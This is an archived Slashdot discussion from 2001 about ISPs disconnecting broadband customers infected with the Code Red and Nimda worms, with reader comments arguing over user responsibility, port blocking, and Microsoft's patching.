Slashdot Mirror
Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
I received a nastygram yesterday saying a machine on my network was infected. Being a responsible netizen I took it offline right away, of course.
But the email begged the question in my mind: Would @home continue billing me if they cut me off? Damn right they would've...
Who did what now?
Why is it an ISPs job to have any concern over what's passing across the wires? They are just packets and that should be that. If users wish to run systems which are configured to respond in a particular way to particular requests on port 80, that's the users' business.
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying. As the poster said, users should be responsible for their own systems.
-- Ed Avis ed@membled.com
Free Mac Mini
Personally, I agree. I would rather have an ISP shut down infected users (who, I think, should at least check to see if they are infected, esp. with all the media coverage) rather then block ports so that I can't do stuff. Shut them off, let them call, inform them, if they haven't fixed it in 24 hours, shut them down again. If I was on the recieving end, I would just think that this ISP was being a responsible netizen.
SealBeater
-- Its survival of the fittest...and we got the fucking guns!!!
Microsoft will never fix the problem without making sure people have to pay a monthly subscription
I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.
Yes its the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) on his box getting hacked. If you're on the net, its you responibility to stay safe.
http://twitter.com/onion2k
Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users.
Confuse users? Bah! They get confused well enough on their own!
My major issue with blocking ports is that, well, no ISP should! An ISP provides internet connectivity, and that's what they should do.
Yes, I agree they should have some say so over what traffic comes and goes over their network (i.e. no spam, DoS attacks, etc), but I myself would not give any ISP my business if I knew they were making choices about which ports I can or can not use.
I think they are doing the right thing by booting infected users. It's certainly better than any form of port blocking.
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
Absolutely; I agree that these users should be kept off the public network until they learn to take care of their systems. I am on a campus network, so their are literally hundreds of systems here atacking mine right now. In fact, in the last three days I've had close to 12,000 of the worm attacks, but about eight hours ago they stopped abruply. I made a phone call, and it turns out that the university did the exact same thing. Every user that was infected and actively broadcasting attempts to infect others for two days was disconnected from the nework. At first it seemed drastic to me, but we're using a public resource, and their traffic was polluting our already-clogged network.
A small, good firewall would be nice. There's defenitly a market for small - palm sized maybe - firewalls.
Look a monkey!
My firwall logs quadrupled in size when Nimda hit, and there are still loads of people in the 194.217.0.0 range infected. My router's set up to block many of these, to save to load on the firewall, which happens to be the webserver too.
I've been contacting Demon Internet (UK ISP), trying to get them to shut down the people responsible. So far, no joy.
Tom.
Oh arse
"I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. "
I think the huge underlying problem is that a) people do *not* know their box is infected and b) if they do know, they have no idea what to do about it. Don't forget, most people are very timid and lack any basic knowledge regarding computers. All they know how to do, is double click on the word2k icon, or outlook, or whatnot.
S.t.e.v.e.
(this solution may or may not work, I haven't really thought it through) Maybe ISPs should setup a private net. Then when people get infected, they switch them to the private network, and all the customer can get is a site where they can download a patch for their machine.
Of course this would be an expense for ISPs, but it sure would be nice to have these people off the Internet until they get their stuff patched (yes, I realize that's what's happening now, but this would be a nicer way to do it). Anyway, just a thought.
-ictatha
"... the advance of civilization is nothing but an exercise in the limiting of privacy" - Janov Pelorat
Turning off people's connection is rude. Asking a 75 year old senior citizen, who is just happy to read a few web pages and send mail to his grandkids to keep up an endless stream of patches because a bunch of hackers can disrupt the net is backwards.
Your anger should be directed at the folks who
1) Created the software
2) Created the hack
Or better yet...instead of whining about it you could actually HELP the folks who are infected, I know I am helping several of my wife's friends who just want a PC to help their kids through school.
So hop off your technological high horse and do something to solve the problem.
I'm still working on a clever footer.
Surely if a user is infected, the ISP could cut them off from the world but still allow them access to an internal ftp site with had patches to fix the problem?
He should perhaps consider educating these people about their problems rather than blaming it on the software. The problem is, OSS zealots consider Free software to be superior because of its mechanisms for peer review when in fact it is only "superior" because its use isn't prevalent enough to spark the kinds of worms and viri we are seeing which predate upon the stupidity of the user.
One of the big problems with IIS is that it's very easy to install. In fact many people don't even realize that it is installed - until they get h^Hcracked... and even then not always. M$ often claims that Windows provides easy administration.... that's not always a good idea. Until installing IIS is an non-standard optional extra these internet worms are going to be a problem. ISP's which are "ruthless" (like this has been) will, I'm sure, make alot of people more aware of potential security problems. Perhaps they should take it one step futher and install cracking software of thier own... when an insecure site is found, simply shut it down. If every ISP did this then many worms would not be able to spread quite as quickly. This all assumes that the ISP sysadmins know what they're up to!! Do they?
return 0; }
I agree completely. I've had over 16 000 attacks on my box and it abviously taking a lot of bandwidth. My ISP (University really) is shutting down lot's of computers as a result of the Nimba worm.
If people are so stupid they run IIS (it's forgivable to forget to patch it once a day) they deserve punishment.
I hope this makes people swtich from both IIS and Microsoft Windows NT/2000/XP as a server platform.
Ciryon
Mail 'em a CD?
Sounds to me a bit like the concept of a debtors prison. (People were sent to jail 'cos they couldn't pay there debt's How could they pay 'em off when they were in jail?)
Anyone quoted by a reporter knows how little they understand
Don't believe what you read is the truth.
Yeah, that NIMBUL's a pain in the ass, all right. Your party has to be pretty tough to take him on. It's those damn boots of dodging, they make it impossible for missle weapon-using characters to get a shot in, and he just slams you with spells. I recommend adventuring around a bit before you venture to the Nashkel mines, that way... what?... Nimda!? Oh fuck, never mind...
Would it be better to shut down access to all but a few sites.....
i.e. Any random http site gets redirected to a big message saying 'you have been blocked as you are infected by.....', and then provide links to the M$ or other download pages.
All other outgoing (i.e. smtp, ftp, etc) should also be blocked, but mail collection via POP should be allowed.
Our IT department have completely over reacted, but what's new....
Simon W.
Microsoft has patched this problem a LONG TIME AGO, if you get either of these viruses it's YOUR fault. I'm glad to see ISP's putting the blame where it belongs, to the users.
It's nice to sit in your ivory tower and pretend there's some solve-all solution but the simple fact is, if these people used any other OS they'd be just as open to whatever attacks they were too lazy to patch.
It's NOT an OS problem, it's a USER problem.
"The Internet is a peer-to-peer system..."
er? i think tcp/ip and the ip routing protocols would disagree.
especially since many hi-speed companies ACTIVELY DISCOURAGE YOU from setting up your own firewall to begin with. When I got my roadrunner cable modem, I had to go to a class where the lady who was running it actually said that a firewall "wasn't necessary" and tried real hard to convince us not to set one up... but that, I think, had more to do with the fact that a firewall allows you to connect as many machines as you want on the same IP address...
While the notion that "it's your responsibility to get yourself cleaned up" sounds good, it's an irresponsible one for an ISP to take when they've actively encouraged the stupidity in the first place.
+------------------------------------------------
+ The urge to destroy is a creative urge
What about all those - few - that isn't subject to infection? E.g. Linux users.
Look a monkey!
I think Gartner hit the (blindingly obvious) nail on the head when they released a recommendation a couple of days ago that we should all start moving away from using MS IIS and associated junk and use something more reliable and less buggy instead !
Re: http://www4.gartner.com/ - "Nimda Worm Shows You Can't Always Patch Fast Enough"
I was just asking someone why ISPs don't do this. Why should the subnet I'm get get punished because of users who don't know what they're doing. Obviously they're going to call tech support and then get a quick lesson on how to download and install an MS patch.
I'd rather have the infected parties make some effort instead of the AT&T approach of just closing port 80 and letting the ignorant go unenlightened.
New slogan? Patches are the new killer app!
Let it be known that I had a funny post, and being a karma wh0re I would have gotten my 'earnings' (karmically speaking) for the day. unfortunately the Slashdot ASCII art filter moderated me, no matter how simple I made the message....
So, since I need karma, here's my lame attempt at a 'funny' mod:
fuck you ascii art filter
Jeez, what about just sending them an email? Their ISP would know their email address wouldn't it? How about emailing them an attachment with the patch and telling them step-by-step what to do? Seems obvious to me......
PK: 09F911029D74E35BD84156C5635688C0
"The affects of this worm are detrimental to all and we'd like to give each member a chance to secure their machines. However, after 9/23/01, Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any machine infected with the worm. We apologize for the inconvenience of this, but it is imperative that we ensure our network is not assisting in the propogation of this, or any, worm. All of us are part of a larger community, and it really isn't cool to infect your neighbors."
I'm glad they are doing this. It is about time
"Weapons should be hardy rather than decorative" - Miyamoto Musashi
I think that goes for OS's too
That is, uhm, stupid. Why would you shut down port 80 for infected machines? To prevent them from being infected twice? Shutting down port 80 for vulnerable machines is more sensible, but how do you tell them from the well-patched servers? Blocking ports isn't meant to be a punishment, it's supposed to be a preventive measure.
"Microsoft will never fix the problem without making sure people have to pay a monthly subscription"
Taco, I really, really think you know that Microsoft posted a patch months before this hole was exploited.
:wq!
I keep seeing "Firewall!" being the answer from the security-uninformed. As though this mythical brick wall were a magic shield.
Nimda gets inside your firewall the moment one user clicks on an infected web site or reads that readme.exe e-mail. Then all your beautifully crafted filtering is useless junk.
Here at Georgia Tech our central network people started disabling infected host ports on the second day. It is a "shoot first, ask questions later" situation when something this virulent is flooding the network backbone and impacting the rest of campus. One machine can sit there at full CPU on a 100-Mbit connection and spew quite a lot of attack attempts. We don't let Typhoid Mary wander the city trying to "understand her situation" we quarantine her pronto. Situations like this are a clear and present danger not even primarily from an infection standpoint, but in what they do to the network. If we have a host with a bad ethernet card that is flooding the network, what do we do? Turn off the port if the owner cannot be found or is not responsive. This is not as complex as people are trying to make it.
It would be ideal if there were plenty of time to contact each and every user, but there isn't. They often are not there, are you just going to let that cable modem unit bring your neighborhood to a crawl while the owner is on vacation? I hope not.
I would just like to point out:
a) I told Microsoft that Outlook would get hacked back in 1998 when they had the nerve to release that piece of crap Outlook 98 with the HTML viewer. They said "it won't happen" and "our customers wanted it."
b) I use DSL.net (but not for much longer) and it took me about 20 phone calls before I actually reached someone who could tell me what the hell was going on.
c) My network (unlike the rest of the state networks in Connecticut) did not get infected. Not because I was lucky, but rather because I had already taken the necessary precautions to prevent the worm.
I kinda aggree in this case, but the descision to banish subscribers really is opening Pandora's box.
Sure, turning off offending boxen is good in this instance (though I like some of the other suggestion like creating a private VLAN with the worm-fixes, etc), but what precidents are the ISP's setting for themselves?
Aren't they opening themselves up to be the net-police. If they take this responsibility upon themselves now, how do they relieve themselves of it later. I don't think the courts will approve of a fickle, seeming arbitary (from a laymans point of view) use of enforement power.
Now if this type of offense (worm, SPAM, etc) is covered in the EULA, then I think the ISP is perfectly justified in shutting people off. If there's now way to get ahold of them (no email on file, etc), then the only real way to get their attention is to dam the bit flow.
my $0.02
I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant distregard of basic sysadmin responsibilies: how long has CodeRed been known about now?
However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infect machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.
It would take some setting up initially, but would reap substantial rewards in the long run.
| What, you were expecting
-O_O- +---- something witty?
Just got a phonecall from Siemens SBS in Brussels. :)
Everybody stopped working an hour ago. All PC's have been infected and no more work can be done now!
If this continues we are looking at a lot of people going on a paid holiday
42 + 1 = 42
And since port 80 is the one normally used by an http daemon, and you're (usually) not supposed to be operating a web server over residential broadband, it was a perfectly reasonable measure.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
Despite popular opinion and marketing, the internet is not for everybody. Use at your own risk. If you don't understand what all the risks involved you shouldn't be using it.
For those that continue to tread in dangerous waters, and don't have a clue that their NT desktop at home installed and started a webserver.. too bad, Natural Selection baby;)
I disagree with the "What should an ISP care". They care alot. Bandwidth and network performance is important (unless your a monopoly and don't care). They deal with their respective users as they see fit. If the customer doesn't like it, go elsewhere.
Thou I am disappointed, my codered/nim. page was getting good;)
http://doomicon.darkmilieu.org/cr.html
Awesome!
Look, I'm not for censorship or any other limiations imposed on my freedom... but it is ultimately the broadband companies decision on what they will do with their lines. Saying "they shouldn't worry about this, they just move packets" as posted somewhere above is completely missing the point. If I ran a broadband company I would certainly shutdown what I considered a threat to the greater good of my customers. Whether that is a worm/virus/trojan box or someone running a high traffic porn/X10 site doesn't matter. The fact remains that those companies own the connection and can do as they please with it. So what if they block port 80? Is it really crucial for someone paying a company $40 a month for a decent connection to bitch about? Is that going to cost that someone serious money? I doubt it... and if it is, maybe they should invest in a line that doesn't restrict their access such as a larger backbone. If you don't like the rules of the game, then don't play it.
can't sleep slashdot will eat me
Recieved an email yesterday that speakeasy.net will be shutting down all customers who are infected until they clean their system. I suspect that would require a phone call. This is a good thing that all ISP's should be doing. They should do it quickly and maybe then we'll begin to see some cleaning up in areas where software makers can't seem to fix quickly enough. I for one am tired of these "Zombie" computers infecting others. Two thumbs up to all isp's that do this.
Just thought about problem, infected users have first to -download- the patch, so they get internet connectivity again, so they can download the patch, they need before. :o)
It's like the CD-ROM drivers shipped on CD.
--
--
Karma 50, and all I got was this lousy T-Shirt.
Those affected should welcome this kind of action. After all, the internet provider is closing a backdoor for the customer. That backdoor (FULL system access!) would otherwise keep announcing itself to the world.
The Internet is a peer-to-peer system where one peer can piss in the public pool.
Don't you mean to say pee-er to pee-er?
Yes, most @homes specifically say you can't run servers in their AUPs, although DSL ISPs (and some @homes) typically let you run servers to your heart's content. However, one real advantage that blocking port 80 WOULD have is denying the ability to access the backdoors created by nimda / code red on those machines.
I may be dumb, but I have W2K Profesionnal and NT4 Workstation running on several machines and at install I never saw such a checkbox. That's perhaps because there is no IIS with those versions? (AFAIK there isn't) Or perhaps I have IIS and I'm not aware of it, though that would astonish me since I didn't see it in the "Services".
What the heck are all those people doing with W2K Server or NT4 Server on their workstations? It doens't makeany sense, does it? It's not because the word "server" is in the name of the product that it's better suited to do your normal surfing.
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
this worm is particularly nasty. it's really made my work week, that much is for sure.
...to NTBugTraq? Do they even service pack their server or workstation? The answer is: no not everyone. The information required to be a good MS product admin is there, you just need to get it. If you're a legit microsoft product owner it ought to be required that you get a digest format of their advisories in e-mail weekly. (An even better question is: how many of these IIS servers are properly licensed ???)
...Both, in my estimation. While I agree that it is the responsibility of the user to keep themselves patched, ISPs monitor network traffic, they can easily pay attention when a known high risk virus or worm is flooding their network.
in response to the growing storm regarding users vs ISPs... (/me dons his asbestos shorts)
yes users are responsible for their systems, they are responsible for watching patch levels, they are responsible for watching out for vulnerabilities. So many people throw up an IIS server or what-have-you on their DSL/Cable line it's not funny. Do you think all of them are subscribed to microsoft's Security advisory list?
And for those of you that thought I was beating on the users hard up there...Yes it is the responsibility (nay, the duty) of the ISPs to protect their networks, and by mission of action the internet. I run apache as my webserver of choice, my logs flooded with attempts to find CMD.EXE and ROOT.EXE in all the right MS places tuesday night and into wednesday morning. A veritable denial of service attack. Here's the kicker: I'm on a dynamic IP! (nice about the randomization of searching in this worm...) Many requests were coming from my own ISPs network. Do you think they responded when I e-mailed them? no, they didn't.
A good ISP shuts off a user who (knowingly or unknowingly) abuses their connection. What if this worm were more malicious? What if it caused data loss? Think of the liability that could impose, so'n'so's unpatched web server infected my unpatched webserver and blew away my e-commerce site. Who takes the blame? so'n'so? or so'n'so's ISP?
Don't even get me started on why worm/virus writers should be sending their exploits to anti-virus companies or other proper organizations instead of releasing them into the wild.
I like the comment that Microsoft doesn't fix these issues without the user paying a subscription, or whatever crap MoronTaco is spewing forth today. For his information, every single exploit Nimda uses has been patched. Some have been patched as long as a year ago. These patches are, and have always been, downloadable for free. Windows Update and Windows Update Critical Updates Service will inform users of these patches when they come out. FUD spewing morons.
My ISP (DSL.ca) is doing the same, plus blackholing any remote IPs sending nimbda requests. They blackhole on seeing the first nimbda packet, and unblackhole 6 hours later to give them a chance to clean up in that time.
http://www.dsl.ca/status/
Bitchslapped. Neat.
What?? If I can read than Nimda uses something like 12 or more different exploits in MS products. Not just IIS! It affects IE web browser (the client ya know), is sent via email from people who got it already, and additional IIS exploits as well. So I do not believe there is an old MS Patch for all of Nimda.
I am affected by AT&T blocking port 80 as well I think that port blocking is crazy and drives me nuts. I set my entire web sight up to listen on port 81 and link everywhere on port 81. What a damn joke! Screw big dumbass corps that do whatever they want! They make me feel like I am being telefragged in that I can't do anything about it!!!
Please... post responsibly
ZERO ZERO ONE ZERO ONE ZERO ONE ONE! Just brushing up for my next big invention: Ethernet over Voice (EoV)
I've had almost 25,000 incoming port 80 requests since this virus was unleashed. (That's with my Linux box running constantly.) It's nice to see an ISP doing something productive.
To the naysayers, I'd like to point out that they aren't punishing people; just making them call to get their access back and make sure they're not infected. Remember, the bandwidth belongs to the ISP. They have to protect it.
I wish BellSouth would do something similar, but they've always been clueless. Heck, many of these requests were from BellSouth servers!
You should call somebody that knows what they are doing. I love the fact that everybody blames the software even though it's usually the user who can't be bothered to patch thier systems. If you have no computer skills FULLY EXPECT TO PAY SOMEBODY WHO DOES!! This should hopefully motivate you to learn if you are whining about the money that it costs to get your machine back up. If you are a manager type well then shame on you for not getting some skilled IT help or PURCHASE A SERVICE AGREEMENT FOR YOUR SOFTWARE! You can't have the whole world your way either get some skills or get some money the choice is yours? I fully support thoes ISP's that are doing this I wish mine did because my broadband is next to useless now!
Got hosting
but firewalls usually come with IP Masquerading tools.
I'm glad other people have had more luck with their ISP's. I honestly couldn't understand WHY the lady running the class would DISCOURAGE firewall use -- the only thing I could think of was that they were actually trying to discourage IP Masquerading so people wouldn't be connecting more than their two-machine limit to the cable modem service.
+------------------------------------------------
+ The urge to destroy is a creative urge
Call me a turncoat, but after getting frustrated to high hell, I weeded through my router logs and sent @home a list of offenders and told them to please do something. Seeing as how my ping ranges from 2000ms to timeout to the @home news server, I'd say that they haven't gotten them all yet.
How the crap am I supposed to truly test the multiplayer wolfenstein with such erratic connectivity?!
Can you say "go to Best Buy and buy Norton or McAffee"?
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
not all users are competent to deal with problems like this. the more the virus spread, the more stoopid users vill get infected..
it is causing some concerns that the ISP detect what traffick the user send through the line, but as far as i'm concerned. this is a single 'nannying case' where there would be much more shit happening if the ISP were sitting back doing nothing..
I use Road Runner too. Though I understand it's run differently in different locations.
Although, when all is said and done, if this Nimda thing can be spread through email, a firewall wouldn't really do much good anyway.
+------------------------------------------------
+ The urge to destroy is a creative urge
Road Runner in Central Florida has done the same thing. Don't know if it includes the rest of the country.
:-)
At first I didn't know if they'd blocked just me, to stop the constant flood of email from my auto-notifier
Nothing what commie Torvalds and his three letter (RMS and ESR) henchmen say can change that!
You forgot IBM... ;-P
$HOME is where the
-- silver_p
It's happening already. Our civil liberties are under attack...we are being denied our right to a broadband connection.
If we take these precautionary steps, then the worm has won.
Evil is the money of root.
Shut down all the WinBlows users! No skin off my back. Or don't and let them get infected, wither, and die. I have no pity for the technically crippled.
http://undeadlinux.com
After months of frustration at trying to get ION, I finally broke down and signed up for @home. My fw logs are a tedious stream of nimda and code red horse poopie. Meanwhile my overall bandwidth performance degrades by the hour. Like many of you I use my connection at home for some telecommuting duties, which has been impossible for the last week, and for a full two weeks during codered. It continues to amaze me that the average user is not only lazy, and stupid, but is completely unwilling to take responsibility for the reprecussions of their actions! Let's say I go and have sex with 18 prostitutes in thailand wearing the _same_ condom. Then I find I'm HIV positive. Who has sympathy for me??? PLEASE cut my dick off! Perhaps someday the courts will create a 'computer school' like traffic school and force repeat offenders to pass some courses before they're allowed in front of a keyboard. There could be movies like "Red Flashing Lights" and "Blood on the Admin" that show what stupid IIS worm propogation does the the heart of IT folks everywhere who, although not running IIS themselves, find their upstreams throttled by a pile of uneducated maroons!
Help, I'm being repressed!
You have a phone of your ISP. You call them and they tell you the MD5 or at least length and CRC of the antiviral program. And this procedure should be described in the letter.
They who will not follow the recommendations have chosen their fate theirselves. Amen.
I have been reading a lot about these viruses in mainstream and off-line media, and not one has yet to say this has to do with a very specific Windows weakness.
Not one mentions the fact that Apples can't get this. I don't know who Microsoft's spin-meisters are, but they should be patted on the back for this one. They have managed to avoid taking any blame for faulty software.
As was pointed out in an earlier post, Apples are immune to this sort of thing. Say what you will about them, this is just another reason why it is a superiour OS.
Don't get me wrong, I don't have a Mac anymore, as they don't run the games I want to play, nor does the ERP I consult on have a Mac front-end, but for the "75 year old" who just wants email-they are great.
david
Sig. Ah...yeah, right. Wait a sec. I'll come up with one yet...
AT&T Broadband's modem leasing agreement clearly states that you can run a http or ftp server.
Free Mac Mini
Yes it sucks, yes it's unfair and yes you'll probably have to pay fixe times your normal price to have it enabled but it'll deter those people who have no need to run a web server (ie. those who don't realise they're even running a web server) and will make the DSL providers life a little easier.
You'll see.
Avantslash - View Slashdot cleanly on your mobile phone.
I've been running Apache on my Linux box for about five years, and I've never patched my system! How can I tell if I'm infected? I imagine that I am, due to the man lines in my logs where people are trying to access my /scripts/ directory and default.ida, and i can't seem to find these things anywhere on my computer
Please advise
but they are running IIS Which isn't a free web server, they should have paid plenty of $ to run it
Actually, IIS is entirely free. Or at least it comes built into Windows 2000 and 98, and is downloadable for free for NT and 95.
My Journal
Our campus was affected rather badly by Nimda, and as a result the students were cut off from the network to make sure that they weren't infecting or being infected by the worm. The outage only lasted as long as it took McAfee to distribute the cleaning agent for it.
If you have cancer, you cut it out, right?
It's not unwelcome nannying, it's a necessary precaution. You do what you have to do to ensure that you maintain your level of service.
Burn their crops and salt their earth.. Damn lusers who don't keep their systems up to date should be dragged out in the road and shot.
-- Posted using RedHat 5.2 with a full install, no firewall.
Weapons of Mass Analysis
I think you are missing the long range plans of Microsoft. Antivirus companies are the same way.
you buy a product and then get hooked into a subscription fee to keep getting new updates to the software (virus) libraries.
Microsoft's intention is to move away from a Sale to a Rent business model. In the event that you don't pay the rent, you either have zero access to anything or at least zero upgrades/updates to the software you currently have.
Most people would consider it a basic responsibility of the manufacturer to inform it's customer base of a known problem and to provide remedy for little or no cost. In the automotive industry, this is a recall. They don't like it, they don't profit from it - but sometimes they have to do it.
Software has excused itself from the product liabilities of other industries because of their EULA's and people have come to accept them. Would you purchase a Car (life threatening potential) or even a TV (non-life threatenting potential) if there was an agreement you had to sign stating that the manufacturer is not making any guarantee of product performance (car:brakes / tv:reception or cable compatability)? I would hope not.
The ISP's are simply dictating that there be a reasonable level of responsibility enforced on the use of their network. If this means people have to pump millions into firewall hardware/software or if Microsoft has to patch their code - they really don't care. They are just protecting their "turf".
I think that what they are doing is a fantastic display of responsibility and enforcing the users to be responsible for their own activities, hardware, software.
That article you linked to offers a strange argument, that making a certain feature of the OS a little harder to get to (but not even close to difficult) is somehow security? Secondly, raw sockets don't violate the security of winXP in any way; if another computer can't handle badly formed network data coming in then that's a problem with the *other* system, not winXP. Thirdly, adding raw sockets is a very common add-on to windows and linux just to do these kinds of DoS attacks. Anyone who claims that keeping raw sockets somehow obscured is going to make any difference is living in a reality other than our own. Finally, they talk about how all winxp home boxes let programs run as "root" -- so what!? This is the same as win9x, macos, win2000 with users who run as administrator, and linux with users who run as root! Home users should have access to the entire functionality of their computer if they want to!
It's up to the operating system to be able to *handle* badly formed data, not other OSes to protect it from it! What happened to the dictum that "security through obscurity isn't security at all"? I bet if microsoft *removed* any raw sockets support we'd see a similar article saying how much they don't understand security, and how this won't solve any problems. Microsoft is always in the wrong. There's a huge double standard in the linux community.
I've read most of the posts and all most of the comments are sound, but I think the problem is this.
.NET anywhay when we'll all be "A Registered User" working for "A Company" in "Somewhere Road, Somewhereville, Somewhere, S0M3 WH3R3")
:-)
While we cant blame Microsoft for the problem not being addressed in a patch, and its probably unreasobale to expect bug free software (although alot less would be nice) isnt the problem that although the patches are available Joe end-user doesnt know anything about them?
To be fair everyone here knows about new patches because they either subscribe to the security mailing lists, or they read it on Tech news sites. Joe E-U doesnt do either of these (and frankly doesnt care) so you could argue its unfair to blame him for not patching his system (you could also argue that if he wants to swim in the web sea he better learn to swim and not use a lifejacket). Yes the fixes are probably in the Windows Update thingy but most users probably dont bother about that either (and a reminder probably wont work either otherwise their AV would be up to date as well)
While I dont think this is fair on the ISP's the only thing I can think of is each ISP mails all its users when patches come out (for any Windows OS, Mac users aside (and I'm not having a dig, I have a mac too) I'd expect people running anything else to have a clue), has them for download on its own web site (coz the MS site is just a jungle) and has their tech support staff able to help install them. Add that these updates are required by the TOS and now there is no excuse for non-patching (and cue increasing ISP charges and lay-off of all the 'script readers' who man the hell desks at the moment and really get on my wick when I'm trying to get to the bottom of a routing problem).
(tangent)
Doesnt it make you mad when you ring up to report a fault and they tell you there arent any reported faults? Duh what the hell am I doing if not reporting a fault, someones got to be the first!
(/tangent)
Its not viable to let MS email all the users because:
a. No one trusts them with their correct contact details (what good is
b. No one botheres to register anyway (and will only give out the mandatory Coutry info for the WPA crap once they realise thats all they have to)
c. The system would likely be insecure and someone whould hack it for the details and/or send out spam/viruses
d. Did I hear someone say "shitloadsoftraffic"
Of course, it'll never happen but I think blocking accounts is the right thing to do (tongue-in-cheek) after all if Steve Gibsons right it'll only get worse when XP comes out(/tongue-in-cheek) Theres no point sending emails, one of my clients had Nimda and you couldnt get out on the web at all through the scanning.
....but all they found there was a man who repeatedly said that nothing was true, but was later found to be lying.
I pay for connectivity and bandwidth.
It's a good thing ISP's kick off the infected machines.
On the other side, people who have infected machines are not to blame, most of them have
no clue what happens nor do they know how to stop it or prevent this...
They will learn this way that Internet is like a public road, and they need to follow some basic rules/driving lessons (like do whatever possible to not spreading virusses) to be allowed on the highway.
So, YES, KICK THEM OUT.
ISP's already prohibit use of their network that causes disruption of service for other customers. So all they're doing is simply enforcing the existing terms of service.
In this time of knee-jerk reactions to terrifying disasters, this warning seems richly appropriate.
...if ISPs could understand the significance of CodeRed and Nimda and use this as an opportunity to begin supporting and encouraging the use of alternate OSes like *BSD, Linux, Mac, etc?
www.sguil.net
The Analyst Console for NSM
No they should shut down everyone. They should have done this from the beginning. If you read the user agreement, it states that you are not allowed to run any servers. This is one way of enforcing the agreement. I personally do not like the agreement, but since I do not plan on running a server, I can live with it for now.
This has been the policy at my company at sometime.
Power Corrupts,Absolute Power Corrupts Absolutely, leaving one person(group)in charge is absolutely corrupt.
Could somebody please tell me how is it that all those people run IIS on their home box? I won't believe that they all bought Windows 2000 (or even NT). Most likely, they just borrowed a CD from their work place to have a free (as in "I stole your beer") operating system.
It's not friendly but I am very happy that those hypocrites have been cut off the Net. If they didn't want to pay for their OS, they should have gone for BeOS, Linux, *BSD and the like. They can only blame themselves and consider themselves lucky nobody is knocking at their door to ask them their Windows License number.
Lawyers out there........
For us non MS users, who can be assumed to not have paid microsoft and therefore not accepted a license agreement absolving them of all responsibility for the damage their systems do: Do we not have a case for damages, since the behaviour of their appalling insecure software (see gartner.com) is causing inconvenience and hardship (due to the general widespread effect upon the internet) to ourselves?
Oh wait, look at Redhat, look at Debian, look at any other linux distribution. I guess, according to your logic, that linux developers also "don't care"?
If some piece of software contained a bug that the operator did not (and could not, I'm speaking generally here, not regarding the sendmail example) know about, then I would say it's entirely the creator of that piece of software's fault...
But as mentioned in the parent post, patches for the latest microsoft worm exploits were available a few months to up to almost a year ago. And they were all right there for all to see on Windows Update. Your argument holds no water
The following sentence is true. The preceding sentence was false.
My provider, Videotron (cable access), is blocking any incoming request to port 80 from the outside. Consequently, my web site is no longer available but it was against the service agreement anyway, so I cannot complain. I still have access to any other services (I have a sshd running).
I've got only 18 nimda attempts yesterday so I must admit that my ISP has taken an appropriate measure. They've started doing that with Code Red and never removed this filter (and they must be very happy with that...).
All humans are mortal. Socrates is a human. Socrates is dead.
I pay for DSL, i can run *WHATEVER* i want on it. Saying "tough beans" is a little short sighted.
/. this week... NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS.
If, on the other hand, they would like to have me charged me (as in contact the RCMP or %your_local_federal_police%) for cracking i would 'understand'... the rule of law is always the highest order, to simply make endless arrays of rules in contracts - and force people to abide by them (least they go without(be martyrs)) then why have Law? Why have Legislature? Corporate COntracts for all manner of 'things' are creaping into every crack of life. These "contracts" force people to give up their rights in order to exist in a corporate controlled world... think IM nuts? go read some of the EULA discussed on
This isnt exactly a 'cut and dry' issue, these contracts basically allow, arbitrary 'for the greater good' decisions to be made by the DSL providers... I know that their TOS probably say "no bandwidth hogging servers" but, when ALL DSL is provided under the same TOS it becomes a method for DSL providers to make decisions about what I may - and may not - run on my box. I pay for bandwidth, allowing them to decided what data i may send and rec oversteps the bounds on my 'RIPE FOR ABUSE' meter.
Think of the Censorship analogy - if they can censor some speech, then they are only an 'arbitrary decision' away from censoring *YOUR* speech. Whats to stop them from saying "you cannot download streaming OGG because there is no publisher-protection-scheme built it, and you may be violating copyright...
again, i may sound a bit unreasonable, or maybe paranoid, OBVIOUSLY I am not saying we want to allow these worms to run, but we must be weary of 'seemingly' reasonable decisions when made by 'powerful' (plutocratic) people.
What do you want to patch today?
Money for nothing, pix for free
message
190920010807595210%iain@caradoc.org,
I am inclinded to agree. But does anyone have such a script?
Prime numbers are exactly what Alan Greenspan says they are -S. Minsky
Like Microsoft doesn't have enough money to repress a OS with an obvious and known security flaw... that I DUNNO, caused a lot of traffic jams.
Yeah, if it was all about cost, then that was irresponsible, even by Microsoft's standards.
At our company, we get alot of calls as it is where the customers think we are responsible for fixing their computers in the first place.
:)
